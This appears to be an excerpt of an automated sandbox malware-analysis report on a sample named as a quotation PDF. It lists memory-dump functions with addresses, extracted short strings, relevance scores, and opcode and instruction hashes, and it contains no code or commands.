Opcode Fuzzy Hash: 0ad4594046b1ba41bdf0efe7631620ce8f9f200419d2a9fe52358bd65fd6d696
Instruction Fuzzy Hash: 1842D331A5CA8A4FE758EA6CD4556BD7BE2FF94740B5400BAD04DC7293CE28EC42C782

Function 00007FF887CD0210 Relevance: 5.7, Strings: 4, Instructions: 705COMMON

Download Yara Rule

Strings

A0_^, xrefs: 00007FF887CD0301
C0_I, xrefs: 00007FF887CD0404
6f, xrefs: 00007FF887CD069E
0Xp, xrefs: 00007FF887CD0814

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 6f$0Xp$A0_^$C0_I
API String ID: 0-4251350429
Opcode ID: 95ee74225a4d16f284c5309a3cab03b017d3c2209f189971e3cbc994321a697b
Instruction ID: 5f1b6d69f9c9d2ad5d9d494d0e0cc45381bbd45c08069db1546001da48af6297
Opcode Fuzzy Hash: 95ee74225a4d16f284c5309a3cab03b017d3c2209f189971e3cbc994321a697b
Instruction Fuzzy Hash: 3C32E231A1CA8A4BE758EA6CD8557F97BE2FF55350F1440BAD44D87193CE28F882C782

Function 00007FF887B0E180 Relevance: 2.0, Strings: 1, Instructions: 798COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887B0E421

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f
API String ID: 0-3006726731
Opcode ID: eaceb2e928778cb63c9af5e33ca679ee6c4a4be3d68702e47ddcd3546af15c10
Instruction ID: 41f09b2be8f3bc1719c6f5d47ea0e7854da547c86cea377f685742a658787cbc
Opcode Fuzzy Hash: eaceb2e928778cb63c9af5e33ca679ee6c4a4be3d68702e47ddcd3546af15c10
Instruction Fuzzy Hash: 3F72C570D0861D8FDBA8EF58C895AACB7B2FF59344F1441A9D01EE7292CA34A985CF44

Function 00007FF887AF1368 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c98b91a0ec895b5a6c7638400dbc92adaa5938546e7db9e7d15210a8506783b
Instruction ID: 0b89d753a5a316409a7cfefe46aaba11c1f146015259ee03428f3f3747586d83
Opcode Fuzzy Hash: 8c98b91a0ec895b5a6c7638400dbc92adaa5938546e7db9e7d15210a8506783b
Instruction Fuzzy Hash: E651266084D3C54FE35A9B7488655797FF0EF52354F0902FED489CB193EE18A846C352

Function 00007FF887CD9D6D Relevance: 20.1, Strings: 15, Instructions: 1311COMMON

Download Yara Rule

Strings

hyp, xrefs: 00007FF887CDA853
hyp, xrefs: 00007FF887CDA90B
hyp, xrefs: 00007FF887CDA02C
hyp, xrefs: 00007FF887CDA7C9
hyp, xrefs: 00007FF887CD9FFE
hyp, xrefs: 00007FF887CDA187
hyp, xrefs: 00007FF887CD9FD0
hyp, xrefs: 00007FF887CDA47B
hyp, xrefs: 00007FF887CDA881
hyp, xrefs: 00007FF887CDA7F7
hyp, xrefs: 00007FF887CDA8AF
hyp, xrefs: 00007FF887CD9FA2
hyp, xrefs: 00007FF887CDA79B
hyp, xrefs: 00007FF887CDA825
hyp, xrefs: 00007FF887CDA8DD

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp$hyp
API String ID: 0-1723113925
Opcode ID: 0b3d61ebc78b2ea62c1689aeb269fdf9a5842ad6415d209099ef8ec653a843bf
Instruction ID: 342b547fe6607b816aad492892decb133384a172c44b606f2a16d08b275817d0
Opcode Fuzzy Hash: 0b3d61ebc78b2ea62c1689aeb269fdf9a5842ad6415d209099ef8ec653a843bf
Instruction Fuzzy Hash: 5682D431A58A4A8FEB699628C4582BD7BF3FF94350F14467ED05AC32C7DE28AC42D741

Function 00007FF887CD23BD Relevance: 7.2, Strings: 5, Instructions: 968COMMON

Download Yara Rule

Strings

0#p, xrefs: 00007FF887CD266C
(Lp, xrefs: 00007FF887CD2A51
, xrefs: 00007FF887CD2A7D
x!p, xrefs: 00007FF887CD2994
, xrefs: 00007FF887CD2772

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: $ $(Lp$0#p$x!p
API String ID: 0-2190574134
Opcode ID: d792bfc012286fe88be056fec777a67b77b0c19631126b5979959397652a5874
Instruction ID: 62e819a4f467bc89d3f4fa8c3403d6e52f18f1a83c75cbfe7cdd7849b0c40272
Opcode Fuzzy Hash: d792bfc012286fe88be056fec777a67b77b0c19631126b5979959397652a5874
Instruction Fuzzy Hash: 43528331A589494FEBB9EB2CD459A783BE2FF58340B5501B9D44EC72A3DE28EC81C741

Function 00007FF887AF0AA1 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

p[h, xrefs: 00007FF887AF0B9A
r6f, xrefs: 00007FF887AF0C3F
p[h, xrefs: 00007FF887AF0BDE
p[h, xrefs: 00007FF887AF0BBC

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: p[h$p[h$p[h$r6f
API String ID: 0-3494664929
Opcode ID: 8e5543bca1caebc8ba92b9a922134e9b247437b8d599508d183a08774dffb76e
Instruction ID: b585da4fca23136b125d66d8b81f3fb2b1f6f3c09221168c49b07945e5b8d516
Opcode Fuzzy Hash: 8e5543bca1caebc8ba92b9a922134e9b247437b8d599508d183a08774dffb76e
Instruction Fuzzy Hash: EB51D421E48E5D4FE7A5A778446A3BE67E1FFA8790B4401BAD40EC72D3DD1C6C428382

Function 00007FF887CD16B0 Relevance: 4.2, Strings: 3, Instructions: 455COMMON

Download Yara Rule

Strings

K40_^, xrefs: 00007FF887CD1B1D
0_L, xrefs: 00007FF887CD176D
@, xrefs: 00007FF887CD1BE7

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0_L$@$K40_^
API String ID: 0-51565385
Opcode ID: 59ef76ad344a8fad6483e823f80611678c14a93bfff29511b463e532b31c2a6a
Instruction ID: 649b5b6f91d3e822c8e38bf202c5899a08a7c57cea337806cec7f60037eeded7
Opcode Fuzzy Hash: 59ef76ad344a8fad6483e823f80611678c14a93bfff29511b463e532b31c2a6a
Instruction Fuzzy Hash: 7AE10670A4D68A4FE3659B28D45537D7BE2FF86350F1901BAD489C72D3DE28AC46C342

Function 00007FF887CDB3E1 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887CDB555
r6f, xrefs: 00007FF887CDB49C
r6f, xrefs: 00007FF887CDB482

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f$r6f$r6f
API String ID: 0-1902842539
Opcode ID: cffff4c15f57f04b03d3df1f5accdaf0ea5088308ac921affc0d64db3d06b3e2
Instruction ID: 2ad67ee47b9c668bb759ff6dd12e2a8cbc0a30735f584f010c61906f0a070f56
Opcode Fuzzy Hash: cffff4c15f57f04b03d3df1f5accdaf0ea5088308ac921affc0d64db3d06b3e2
Instruction Fuzzy Hash: 2891C131A4DA4A4FE7689E58D4556BD7FE2FF95368B14017EC04AC3283EE68A802C381

Function 00007FF887AF5655 Relevance: 3.3, Instructions: 3301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c09ff8f46860b275012cba6e74177153ff360556f7c2cee1383f3469b5e4fe36
Instruction ID: 3e90a03f016de4c8ab95fe575fd11529a7a9e572c26bd2c9a68c688be390f11f
Opcode Fuzzy Hash: c09ff8f46860b275012cba6e74177153ff360556f7c2cee1383f3469b5e4fe36
Instruction Fuzzy Hash: 2133373198D8854FD768E62888676AC3BF1FF9A361B1802F9D05DC75D3DA2DAC0AC741

Function 00007FF887CD8A85 Relevance: 3.3, Strings: 2, Instructions: 801COMMON

Download Yara Rule

Strings

6f, xrefs: 00007FF887CD8BFF
b4f, xrefs: 00007FF887CD8BE9

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 6f$b4f
API String ID: 0-713595489
Opcode ID: 8fc1598e73035d2d05962cb8c6bff05f4da8a3fa12e701d771321f6e897cd2ee
Instruction ID: cf3fffe26321d27dc524ffab462c566b2ece4cf28aee556a08e00a0c41903bb5
Opcode Fuzzy Hash: 8fc1598e73035d2d05962cb8c6bff05f4da8a3fa12e701d771321f6e897cd2ee
Instruction Fuzzy Hash: A932A030A58A598FDBA9EB28D4556AD77F2FF98340F1041B9D04EC7297DE34AC42CB81

Function 00007FF887AF4CDB Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

6f, xrefs: 00007FF887AF4CFD
6f, xrefs: 00007FF887AF4DD8

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 6f$6f
API String ID: 0-3035579446
Opcode ID: 1cc17cd9f046e613379d6fffffe8930c7f5c75dad5bbbe746f64677dff7e4d4e
Instruction ID: cdbe81bfa92f6fde993447cdb6f605c37988b88a14a61814853a4c1bfafccce8
Opcode Fuzzy Hash: 1cc17cd9f046e613379d6fffffe8930c7f5c75dad5bbbe746f64677dff7e4d4e
Instruction Fuzzy Hash: 85510231B1CA494FE789EB6C845A3BDBBE1EF99750B4441BED04DC72A3CD289841C742

Function 00007FF887B012A0 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887B012AB
,, xrefs: 00007FF887B012FF

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: ,$r6f
API String ID: 0-4076606999
Opcode ID: 7c0bdab9a953ac6e774bfb100ea6b3a722943ec6cda129aa085aba39c772e213
Instruction ID: baafa0f1adaa0a4cf39b7b63f0b5fc9bec865a0299af97b1d5c35c935e2179b9
Opcode Fuzzy Hash: 7c0bdab9a953ac6e774bfb100ea6b3a722943ec6cda129aa085aba39c772e213
Instruction Fuzzy Hash: 65019575E446298FEB64DB14C988AE8B3B1FB59311F5042E5C00DE3291DB79AAD4DF40

Function 00007FF887C31520 Relevance: 2.4, Strings: 1, Instructions: 1119COMMON

Download Yara Rule

Strings

&:_H, xrefs: 00007FF887C31653

Memory Dump Source

Source File: 00000000.00000002.1935770398.00007FF887C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c30000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: &:_H
API String ID: 0-3368404865
Opcode ID: 4183359ac5851d91f985a2245d67082da36194f4904abf8bb871da249f623158
Instruction ID: c129c6877bde9ff488be819897479b6957d08ba04928c5c58ed71298c506bdf0
Opcode Fuzzy Hash: 4183359ac5851d91f985a2245d67082da36194f4904abf8bb871da249f623158
Instruction Fuzzy Hash: 15824A70E98A5A9FEBA4DB68C8556FC77F2FF59381F140175C00DE3292DA38A881DB40

Function 00007FF887CD4F60 Relevance: 1.9, Strings: 1, Instructions: 679COMMON

Download Yara Rule

Strings

0Wp, xrefs: 00007FF887CD5137

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0Wp
API String ID: 0-545783698
Opcode ID: 32139c14118c7fcb4d53a65eb863e3b776456c7b11527d833f19c32a84523af4
Instruction ID: 8b17e6b5bad83b5f6e038fa0312d38a5caf720b774e9809a5ae176eabd668653
Opcode Fuzzy Hash: 32139c14118c7fcb4d53a65eb863e3b776456c7b11527d833f19c32a84523af4
Instruction Fuzzy Hash: 09229431A5894D8FDB98EF68D495AAD7BF2FF69340B140179E40DC7296DE34E842C780

Function 00007FF887C3206B Relevance: 1.8, Strings: 1, Instructions: 528COMMON

Download Yara Rule

Strings

9, xrefs: 00007FF887C325AC

Memory Dump Source

Source File: 00000000.00000002.1935770398.00007FF887C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c30000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: ed5348446e43a82eb9a84be4f3700df4b0ee1c4678f8d61364d28d9859624597
Instruction ID: 565979421d0f1aa41584040378c1b16a8cda63d1362a9b46c7b72868c44d6038
Opcode Fuzzy Hash: ed5348446e43a82eb9a84be4f3700df4b0ee1c4678f8d61364d28d9859624597
Instruction Fuzzy Hash: 4B12A470D88A1E8FEBA4EB68C8557BDB7B2FF58345F500179D00DA3296CB396981DB40

Function 00007FF887CD71CD Relevance: 1.7, Strings: 1, Instructions: 488COMMON

Download Yara Rule

Strings

(Lp, xrefs: 00007FF887CD7BAD

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: (Lp
API String ID: 0-3627211255
Opcode ID: c380283b1d4e89995cc346e9d6979b0beadf1fb95aeae517280678aa114dca7f
Instruction ID: 596ee59808212fe5687201bca0a49341b279620b8da0fdd28746a6a23e79c5b0
Opcode Fuzzy Hash: c380283b1d4e89995cc346e9d6979b0beadf1fb95aeae517280678aa114dca7f
Instruction Fuzzy Hash: 8FE1C331A4DA894FD7A5DB38D85566D3FF2FF9A340B1805FAD04DCB293D928A805C342

Function 00007FF887AF545C Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: 40db3bcebecb44a04fa9ffba3ef617cd7db8cd67389a592aef16d34de5333d0d
Instruction ID: 72e05063bfc794b59f794aa79e1d6e7a4c1de123ad10738c825c90d6f003b374
Opcode Fuzzy Hash: 40db3bcebecb44a04fa9ffba3ef617cd7db8cd67389a592aef16d34de5333d0d
Instruction Fuzzy Hash: 84D1082060DA854FD75A9B7C88662687BF1FF4A350B5902FAD08EC72D3DE1C9C46C352

Function 00007FF887CD5766 Relevance: 1.7, Strings: 1, Instructions: 436COMMON

Download Yara Rule

Strings

~, xrefs: 00007FF887CD5766

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 10808e6f801af4d2bf3ad8e88e0f48e50bf09a698e3711716b9ee8c43e820150
Instruction ID: 82344c519fdabf9b362360c1804a33bbd970c4c4cbc9f8c209da14e1f9a78f97
Opcode Fuzzy Hash: 10808e6f801af4d2bf3ad8e88e0f48e50bf09a698e3711716b9ee8c43e820150
Instruction Fuzzy Hash: FFD13530A4EA8A4FE765E72CD8556787BF2FF99350B0800BAD04DC7193CE28AC46C341

Function 00007FF887AF37BA Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

b4f, xrefs: 00007FF887AF37FF

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: b4f
API String ID: 0-3391181744
Opcode ID: 0408c4815c9717381b9449c5da3838da6b7efb2d73c90f5040f812cc73380fb9
Instruction ID: a2bd497fd7fe6e382b6c5ae75879de4769d209bf547303aa1094f1d0a61fe735
Opcode Fuzzy Hash: 0408c4815c9717381b9449c5da3838da6b7efb2d73c90f5040f812cc73380fb9
Instruction Fuzzy Hash: 6CF1047190E6898FD70EDF24C4969AEBBB1FF55344F2441EEC04EDB292CA3A6805CB51

Function 00007FF887AF71B3 Relevance: 1.7, Strings: 1, Instructions: 419COMMON

Download Yara Rule

Strings

`_h, xrefs: 00007FF887AF71B4

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: `_h
API String ID: 0-2312422356
Opcode ID: 6719da84eac53538eaebb4332169e0a0543763e818603ab8eb6dc85864dbbf93
Instruction ID: ed2ca017e950784b69f730f5af6194b61e4a42b6453b07537e91de1499585d8f
Opcode Fuzzy Hash: 6719da84eac53538eaebb4332169e0a0543763e818603ab8eb6dc85864dbbf93
Instruction Fuzzy Hash: 0AD10820A0CE864FE7559B7C98662687BF1EF5A350F5902FAD08DC72D3DE189C46C352

Function 00007FF887CD3BB9 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

:_, xrefs: 00007FF887CD3CD2

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: :_
API String ID: 0-1131905614
Opcode ID: c2708956aa104e07d3964b27684cf9baeeffc6f12315090dc81eaf158e761fd3
Instruction ID: d9565a5d5717dc143ab87ec57ac0ce84a1895c4a1c6206a45b50b608c0b686a6
Opcode Fuzzy Hash: c2708956aa104e07d3964b27684cf9baeeffc6f12315090dc81eaf158e761fd3
Instruction Fuzzy Hash: 93C18F30B58A498FEB59EB6C9455ABD77E2FF99340F100179E00DC7293DE28AC428781

Function 00007FF887AF549B Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: 0906433300c1d27c271f2ccc7f6f6a025beaa6ba61a576a6ddf37af379912c3f
Instruction ID: e19b50c19a28a9cfedde7acd45790a782563d19a30847bf6d68fd5ac811bc025
Opcode Fuzzy Hash: 0906433300c1d27c271f2ccc7f6f6a025beaa6ba61a576a6ddf37af379912c3f
Instruction Fuzzy Hash: 17D12920A0DA854FE75A9B7888652787BF1FF5A350B5902FAD08EC72D3DE1C9C46C352

Function 00007FF887AF547E Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: 2dd1126f2ed7d71aff8332d2f42e6f66377f77ffb7e65cf1ed9ba9dfedce3308
Instruction ID: afb73aefd0a179a9ca22e6a76016dab402140ca583d8d9114917b94471c5d182
Opcode Fuzzy Hash: 2dd1126f2ed7d71aff8332d2f42e6f66377f77ffb7e65cf1ed9ba9dfedce3308
Instruction Fuzzy Hash: 77D12920A0DA854FE75A9B7888652787BF1FF5A350B5902FAD08EC72D3DE1C9C46C352

Function 00007FF887AF54D5 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: 3bed08ae9e235efcc999f85bfc8cd592938bcd800f9cc07eb57c4df219a60e1c
Instruction ID: 353df09aeeb1e11c67fb8c3367d73ba7d09fb4d689c39d449cf000e621eeb784
Opcode Fuzzy Hash: 3bed08ae9e235efcc999f85bfc8cd592938bcd800f9cc07eb57c4df219a60e1c
Instruction Fuzzy Hash: 73D12920A0DA854FE75A9B7888652787BF1FF5A350B5902FAD08EC72D3DE1C9C46C352

Function 00007FF887AF54B8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: 1e26d32dbcb0f6493ad6b669db54cfd6cd022d237304799f63577d73f28b1e83
Instruction ID: b901172a9089846024e8926c8b654270ffab91c4a788b9f15a1052cae4b3de44
Opcode Fuzzy Hash: 1e26d32dbcb0f6493ad6b669db54cfd6cd022d237304799f63577d73f28b1e83
Instruction Fuzzy Hash: A1D12920A0DA854FE75A9B7888652787BF1FF5A350B5902FAD08EC72D3DE1C9C46C352

Function 00007FF887AF54F2 Relevance: 1.7, Strings: 1, Instructions: 409COMMON

Download Yara Rule

Strings

/f, xrefs: 00007FF887AF5531

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: /f
API String ID: 0-1716792727
Opcode ID: ccabb09d2f824d21632a85cbdb815dca04be2861b6a4bb195e93e272391b0f81
Instruction ID: c2958ec007cb403b358f5dfcbfb25db025bcb3833299359548c121d70bb38fbf
Opcode Fuzzy Hash: ccabb09d2f824d21632a85cbdb815dca04be2861b6a4bb195e93e272391b0f81
Instruction Fuzzy Hash: DDD11820A0DA854FE75A9B7888652687BF1FF5A350B5902FED08EC72D3DE1C9C46C352

Function 00007FF887CDB021 Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

hyp, xrefs: 00007FF887CDB28D

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: hyp
API String ID: 0-3198936173
Opcode ID: f2bccaf7b673926fa388d7493f9c467dc722eba64a08e9b7a7bd6eb034a0804d
Instruction ID: 4af6110b9a13e40d69c46a35c726da2038f8fdb50186a96994e0351053c69518
Opcode Fuzzy Hash: f2bccaf7b673926fa388d7493f9c467dc722eba64a08e9b7a7bd6eb034a0804d
Instruction Fuzzy Hash: C7B12621E9CA8A4FE769AB28D8551BD7FE2FF85354F04017AD04AC7187ED2CA946C381

Function 00007FF887AF1883 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887AF19E2

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f
API String ID: 0-3006726731
Opcode ID: bdef60545369bd72fc0ede2374120208034fe7dc9afa60aa6af0b2a34c3beebb
Instruction ID: 2b736253d0a5dbe6be7fc34d995953d097243ebc4dddba3eae770994a5a36c25
Opcode Fuzzy Hash: bdef60545369bd72fc0ede2374120208034fe7dc9afa60aa6af0b2a34c3beebb
Instruction Fuzzy Hash: 7491A331E5C95A4FEB58EB68C4966BD73F2FF98390F140179D04EC7296DE28A842C741

Function 00007FF887AF05D8 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887AF206F

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f
API String ID: 0-3006726731
Opcode ID: f9646520ca33a3409383c2e11f1d65cdf2c7aa54627bf85c16e2955b72e8e895
Instruction ID: 8a02985413104713e23157ace8f58530ef10db89488203810adfb2d375896724
Opcode Fuzzy Hash: f9646520ca33a3409383c2e11f1d65cdf2c7aa54627bf85c16e2955b72e8e895
Instruction Fuzzy Hash: 06610721A5CA894FE39ADB2C88266BD7BE1FF96340B0941BBD04DC71E7DE189C05C342

Function 00007FF887CD0744 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

0Xp, xrefs: 00007FF887CD0814

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0Xp
API String ID: 0-2732025923
Opcode ID: 98fa2bb705f059dd55b9ef8c574c4722723b8ead159a0e4737f176a61184c949
Instruction ID: 0da7c47b82682347fe99ae12c4d6cee35fd74cd8f5e5c70a74d022717b6f7fd7
